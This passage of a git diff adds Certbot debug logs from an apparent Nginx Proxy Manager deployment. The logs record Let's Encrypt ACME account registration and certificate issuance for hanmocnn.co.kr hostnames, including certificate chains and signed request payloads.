b2Nubi5jby5rcjATBgNVHSAEDDAKMAgGBmeBDAECATAuBgNVHR8EJzAlMCOgIaAf
|
||||||
|
hh1odHRwOi8vZTcuYy5sZW5jci5vcmcvMTE4LmNybDCCAQwGCisGAQQB1nkCBAIE
|
||||||
|
gf0EgfoA+AB+AHF+lfPCOIptseOEST0x4VqpYgh2LUIA4AUM0Ge1pmHiAAABnF5h
|
||||||
|
J7AACAAABQAJd1XWBAMARzBFAiAK+ar1Oe7x8331v3kEuwoGwp+dv74lXiLRR3ha
|
||||||
|
qIaI7AIhAKKyvL5ZXcSPZkDUIojUb1qiT62e6c72VV4nZ1bKj2pwAHYAyzj3FYl8
|
||||||
|
hKFEX1vB3fvJbvKaWc1HCmkFhbDLFMMUWOcAAAGcXmEvPQAABAMARzBFAiEAwlck
|
||||||
|
zhIDZTof4Ly6HlsgLfrQR3w0vZKFcAHUgPHSklMCID3qzQmRZ/23apueRRaFWhn6
|
||||||
|
nFl5c+CM5LkcqPXM3EHXMAoGCCqGSM49BAMDA2gAMGUCMQDeE9lAjzxWJ4rVeKd4
|
||||||
|
6k5AMZFdzthNUAE+cK42bfa/dmjtOsJxmbItPpYHVobCNWUCMHcA28jODrzpXiRs
|
||||||
|
1bzWj5Q4ljROTpshInXRWFBTILNwxZ0O+gcnK6B4h4x7309wZw==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw
|
||||||
|
TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh
|
||||||
|
cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw
|
||||||
|
WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg
|
||||||
|
RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST
|
||||||
|
CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef
|
||||||
|
QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw
|
||||||
|
gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
|
||||||
|
ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4
|
||||||
|
wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB
|
||||||
|
AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g
|
||||||
|
BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu
|
||||||
|
Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD
|
||||||
|
aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF
|
||||||
|
h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG
|
||||||
|
yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr
|
||||||
|
OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o
|
||||||
|
yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S
|
||||||
|
M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ
|
||||||
|
UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq
|
||||||
|
Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I
|
||||||
|
tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ
|
||||||
|
YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty
|
||||||
|
+VUwFj9tmWxyR/M=
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-14 22:59:14,821:DEBUG:acme.client:Storing nonce: 4AH-2vvBHXlFw_TACqGZ1oTRV-SKrkz7zJl6XVjonKPAOUQ_71o
|
||||||
|
2026-02-14 22:59:14,821:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:59:14,826:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkhYbEZ3X1RBQ3FHWjFvVFJWLVNLcmt6N3pKbDZYVmpvbktQQU9VUV83MW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUxOWRkNzNlMGNlOWE4NzQ5MGViYjdlNzVhNzg5ZGY1ZGY1LzEifQ",
|
||||||
|
"signature": "sEsakd4hO8DFc3jDyP7m6Qx5z0Lbusnx8gMc9jh3fDtXm3fpnrj7zk2Gazi9IwMJ12iSd2p1MoEsmNDqwnpqr0INEJHYN6PLJEWwl_YWtaHzb8RbtXrVBEq7h-Ktz0mMJYsC64Pe8Nxm-TvVx6Uj_DwxNxswypZQP95rTjWhIkcK_xL_Bq2dWn1kTBr-rM76gvsbvlYdO2nsnaPqdheow62RxFXscm5F50ixvWiNxFACAC2u7bs9kRZGIumNcHf5_pREpgSuBlodFzpZ8n4cGJgouEafB4ZY6Fr2aTkXyb4_wBBhWvUwmCDHEwg4vE31WR-OHN-325DlYG5SvlUDnA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:14,988:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1 HTTP/1.1" 200 2344
|
||||||
|
2026-02-14 22:59:14,988:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:14 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2344
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/0>;rel="alternate"
|
||||||
|
Replay-Nonce: NeKnt8TG8v_xm54X0ORybpWrtBSiE4_ErhUKHWOcAjOGwrp0dqk
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDsTCCAzegAwIBAgISBRndc+DOmodJDrt+daeJ3131MAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
NzAeFw0yNjAyMTQyMjAwNDFaFw0yNjA1MTUyMjAwNDBaMB8xHTAbBgNVBAMTFGFz
|
||||||
|
c2V0Lmhhbm1vY25uLmNvLmtyMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50
|
||||||
|
LGZLNqLZI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89
|
||||||
|
oqy/XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/Cio4ICITCC
|
||||||
|
Ah0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB
|
||||||
|
/wQCMAAwHQYDVR0OBBYEFBaS++xJtf3XGPCAgqNyrG/f6BjWMB8GA1UdIwQYMBaA
|
||||||
|
FK5IntyHHUSgb9qi5WB0BHjCnACAMDIGCCsGAQUFBwEBBCYwJDAiBggrBgEFBQcw
|
||||||
|
AoYWaHR0cDovL2U3LmkubGVuY3Iub3JnLzAfBgNVHREEGDAWghRhc3NldC5oYW5t
|
||||||
|
b2Nubi5jby5rcjATBgNVHSAEDDAKMAgGBmeBDAECATAuBgNVHR8EJzAlMCOgIaAf
|
||||||
|
hh1odHRwOi8vZTcuYy5sZW5jci5vcmcvMTE4LmNybDCCAQwGCisGAQQB1nkCBAIE
|
||||||
|
gf0EgfoA+AB+AHF+lfPCOIptseOEST0x4VqpYgh2LUIA4AUM0Ge1pmHiAAABnF5h
|
||||||
|
J7AACAAABQAJd1XWBAMARzBFAiAK+ar1Oe7x8331v3kEuwoGwp+dv74lXiLRR3ha
|
||||||
|
qIaI7AIhAKKyvL5ZXcSPZkDUIojUb1qiT62e6c72VV4nZ1bKj2pwAHYAyzj3FYl8
|
||||||
|
hKFEX1vB3fvJbvKaWc1HCmkFhbDLFMMUWOcAAAGcXmEvPQAABAMARzBFAiEAwlck
|
||||||
|
zhIDZTof4Ly6HlsgLfrQR3w0vZKFcAHUgPHSklMCID3qzQmRZ/23apueRRaFWhn6
|
||||||
|
nFl5c+CM5LkcqPXM3EHXMAoGCCqGSM49BAMDA2gAMGUCMQDeE9lAjzxWJ4rVeKd4
|
||||||
|
6k5AMZFdzthNUAE+cK42bfa/dmjtOsJxmbItPpYHVobCNWUCMHcA28jODrzpXiRs
|
||||||
|
1bzWj5Q4ljROTpshInXRWFBTILNwxZ0O+gcnK6B4h4x7309wZw==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL
|
||||||
|
MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo
|
||||||
|
IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN
|
||||||
|
MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j
|
||||||
|
cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/
|
||||||
|
vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF
|
||||||
|
HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw
|
||||||
|
DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS
|
||||||
|
BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA
|
||||||
|
gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm
|
||||||
|
MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww
|
||||||
|
CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu
|
||||||
|
b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX
|
||||||
|
lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb
|
||||||
|
Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-14 22:59:14,989:DEBUG:acme.client:Storing nonce: NeKnt8TG8v_xm54X0ORybpWrtBSiE4_ErhUKHWOcAjOGwrp0dqk
|
||||||
|
2026-02-14 22:59:14,990:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
|
||||||
|
2026-02-14 22:59:14,990:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-2.
|
||||||
|
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-2.
|
||||||
|
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-2/cert.pem.
|
||||||
|
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-2/privkey.pem.
|
||||||
|
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-2/chain.pem.
|
||||||
|
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-2/fullchain.pem.
|
||||||
|
2026-02-14 22:59:14,992:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-2/README.
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
|
||||||
|
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
|
||||||
|
2026-02-14 22:59:15,004:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 22:59:15,004:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 22:59:15,004:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
|
||||||
|
2026-02-14 22:59:15,004:DEBUG:certbot.configuration:Var webroot_map={'asset.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
|
||||||
|
2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user:
|
||||||
|
Successfully received certificate.
|
||||||
|
Certificate is saved at: /etc/letsencrypt/live/npm-2/fullchain.pem
|
||||||
|
Key is saved at: /etc/letsencrypt/live/npm-2/privkey.pem
|
||||||
|
This certificate expires on 2026-05-15.
|
||||||
|
These files will be updated when the certificate renews.
|
||||||
|
2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
|
||||||
|
2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
|
||||||
|
2026-02-14 22:59:15,010:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
|
||||||
|
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
|
||||||
|
* Donating to EFF: https://eff.org/donate-le
|
||||||
646
npm/data/logs/letsencrypt.log.6
Normal file
646
npm/data/logs/letsencrypt.log.6
Normal file
@@ -0,0 +1,646 @@
|
|||||||
|
2026-02-14 22:36:58,989:DEBUG:certbot._internal.main:certbot version: 5.3.0
|
||||||
|
2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
|
||||||
|
2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-1', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'www.hanmocnn.co.kr']
|
||||||
|
2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
|
||||||
|
2026-02-14 22:36:59,006:DEBUG:certbot._internal.log:Root logging level set at 30
|
||||||
|
2026-02-14 22:36:59,007:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 22:36:59,008:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
|
||||||
|
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
|
||||||
|
Interfaces: Authenticator, Plugin
|
||||||
|
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
|
||||||
|
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffab360e50>
|
||||||
|
Prep: True
|
||||||
|
2026-02-14 22:36:59,008:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffab360e50> and installer None
|
||||||
|
2026-02-14 22:36:59,008:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
|
||||||
|
2026-02-14 22:36:59,320:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
|
||||||
|
2026-02-14 22:36:59,323:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
|
||||||
|
2026-02-14 22:36:59,894:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
|
||||||
|
2026-02-14 22:36:59,895:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:36:59 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1033
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
|
||||||
|
"meta": {
|
||||||
|
"caaIdentities": [
|
||||||
|
"letsencrypt.org"
|
||||||
|
],
|
||||||
|
"profiles": {
|
||||||
|
"classic": "https://letsencrypt.org/docs/profiles#classic",
|
||||||
|
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
|
||||||
|
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
|
||||||
|
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
|
||||||
|
},
|
||||||
|
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
|
||||||
|
"website": "https://letsencrypt.org"
|
||||||
|
},
|
||||||
|
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
|
||||||
|
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
|
||||||
|
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
|
||||||
|
"oEbqUiTfyAY": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
|
||||||
|
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
|
||||||
|
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
|
||||||
|
}
|
||||||
|
2026-02-14 22:36:59,896:DEBUG:acme.client:Requesting fresh nonce
|
||||||
|
2026-02-14 22:36:59,896:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
|
||||||
|
2026-02-14 22:37:00,072:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
|
||||||
|
2026-02-14 22:37:00,072:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:36:59 GMT
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtfSb4xuFyI8A1j8PWRQnBciypxtBTvZfd5NvpveG9E4I0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
|
||||||
|
2026-02-14 22:37:00,073:DEBUG:acme.client:Storing nonce: qLPTsdtfSb4xuFyI8A1j8PWRQnBciypxtBTvZfd5NvpveG9E4I0
|
||||||
|
2026-02-14 22:37:00,073:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "contact": [\n "mailto:windpacer@hanmocnn.co.kr"\n ],\n "termsOfServiceAgreed": true\n}'
|
||||||
|
2026-02-14 22:37:00,081:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-acct:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAiandrIjogeyJuIjogInlsZkw4bmp6RXJhUUs3QmtYLUp2bkt0T3JSLVhsME9KMGpEQThHRmVQUG5jSHRnbkFwZlM5SktoM1U0eV9wbUg0aENqR05vUkZSSXEzRjE3Z0ZTRThPY3F3c0VYTWkzVjFOT2R6RU1TNmwzVTZWNW9jTWhSbFNFMHZ6azZsRHpZSlZGY2VKa0xZWjk1MmNhZ3JBc3RnNm05d0VHZXU3RnJRNm9GT3RwTm1nMW1vRmtWY09EWEFpVmRpbldRRGhyblJMQmJXdlRtd0ozRkYzUy1admJMTDdOUnFPSlVDdVFBU2RuWFFGNmRGcFdKbkRGd1dOeXYxR3k4Q0NhZlNrVl9EOEJiUm1SaGlKSXRLNFNUanRVZUhrNWRlVnJqWEpSS2Zfd2RoZ2VjaGVxVGtzVVpTZERTVXVLeVR0cDZFTUVkMHdpalQ0aXpPYXYyQVU2bGp1dmljUSIsICJlIjogIkFRQUIiLCAia3R5IjogIlJTQSJ9LCAibm9uY2UiOiAicUxQVHNkdGZTYjR4dUZ5SThBMWo4UFdSUW5CY2l5cHh0QlR2WmZkNU52cHZlRzlFNEkwIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9uZXctYWNjdCJ9",
|
||||||
|
"signature": "pML7yPmuF20tbvdpBRytdKGGQGUbsNmBY_eTnk8gIqeDcPEwBhchkw3nCgk1Btss3QEeKjdElfogjrlYd8bRiOn5DSM4FsyiuJkTtJX0j80l4XMQlPjzAuFYWskkNWmRoHCtgUKyO8hZ4YB7OLo31Eu4c-hzHl97-fcQ_fSt7ACx-jkJy0EVzvL0T4tZwWasPE4NOZ5FUCbLHgVi7NVs-rLA8o7DpVmWbS2GAi28bmfqHgeCwyMwfeZ_hbKv4wFhHe9ePgQ5Y3HFittE8W12UyC0dbs2oPZDvlmIaS1v2mtxfGpO6Z8I9uLHGSey2IE-DhdDw_cOkpnJiXKe2zrz4Q",
|
||||||
|
"payload": "ewogICJjb250YWN0IjogWwogICAgIm1haWx0bzp3aW5kcGFjZXJAaGFubW9jbm4uY28ua3IiCiAgXSwKICAidGVybXNPZlNlcnZpY2VBZ3JlZWQiOiB0cnVlCn0"
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:00,327:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-acct HTTP/1.1" 201 477
|
||||||
|
2026-02-14 22:37:00,328:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:00 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 477
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf>;rel="terms-of-service"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/acct/3064386906
|
||||||
|
Replay-Nonce: qLPTsdtfD_e1BzmduE7JCgdyITbwkLqfkiF03UuBKCWrQjkunG0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"key": {
|
||||||
|
"kty": "RSA",
|
||||||
|
"n": "ylfL8njzEraQK7BkX-JvnKtOrR-Xl0OJ0jDA8GFePPncHtgnApfS9JKh3U4y_pmH4hCjGNoRFRIq3F17gFSE8OcqwsEXMi3V1NOdzEMS6l3U6V5ocMhRlSE0vzk6lDzYJVFceJkLYZ952cagrAstg6m9wEGeu7FrQ6oFOtpNmg1moFkVcODXAiVdinWQDhrnRLBbWvTmwJ3FF3S-ZvbLL7NRqOJUCuQASdnXQF6dFpWJnDFwWNyv1Gy8CCafSkV_D8BbRmRhiJItK4STjtUeHk5deVrjXJRKf_wdhgecheqTksUZSdDSUuKyTtp6EMEd0wijT4izOav2AU6ljuvicQ",
|
||||||
|
"e": "AQAB"
|
||||||
|
},
|
||||||
|
"createdAt": "2026-02-14T22:37:00.200855652Z",
|
||||||
|
"status": "valid"
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:00,328:DEBUG:acme.client:Storing nonce: qLPTsdtfD_e1BzmduE7JCgdyITbwkLqfkiF03UuBKCWrQjkunG0
|
||||||
|
2026-02-14 22:37:00,344:DEBUG:certbot._internal.display.obj:Notifying user: Account registered.
|
||||||
|
2026-02-14 22:37:00,344:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=JWKRSA(key=<ComparableRSAKey(<cryptography.hazmat.bindings._rust.openssl.rsa.RSAPublicKey object at 0xffffaae470f0>)>), contact=(), agreement=None, status='valid', terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service='https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf'), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
|
||||||
|
2026-02-14 22:37:00,345:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for www.hanmocnn.co.kr
|
||||||
|
2026-02-14 22:37:00,348:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "www.hanmocnn.co.kr"\n }\n ]\n}'
|
||||||
|
2026-02-14 22:37:00,353:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZkRfZTFCem1kdUU3SkNnZHlJVGJ3a0xxZmtpRjAzVXVCS0NXclFqa3VuRzAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
|
||||||
|
"signature": "Mlj3TT4WmdvYZDh8uhxl04owClgR7elXmEmweyy7r-Vbvb3KRbbJRMt4so7IBeilHnTdZWWzWjsm2J_1Rc0wD4yYxGcVX4k6_rTEp1VLtXGvw4YCR7u1u-R5mXWi_Y63qgZiBn-ipdyddrnqZxQ7AduHn4pO76M2-bOtK3_6Xh9Ng9LLCRE3vdlqaVOhq9DgRYd6Ha5rPLcEx_h3l6kkknTch2JR7gnoAUKqtiJr43nCz9TD8WlJukSRB3aBjFt5FpryZG4os8euZsohgI78gr9w6Hx19ylUEJNpOUvJH_6nMtEZXBO3piEz9CRTJluj7w3Fokskx1-ECEQ7PiWVdw",
|
||||||
|
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInd3dy5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
|
||||||
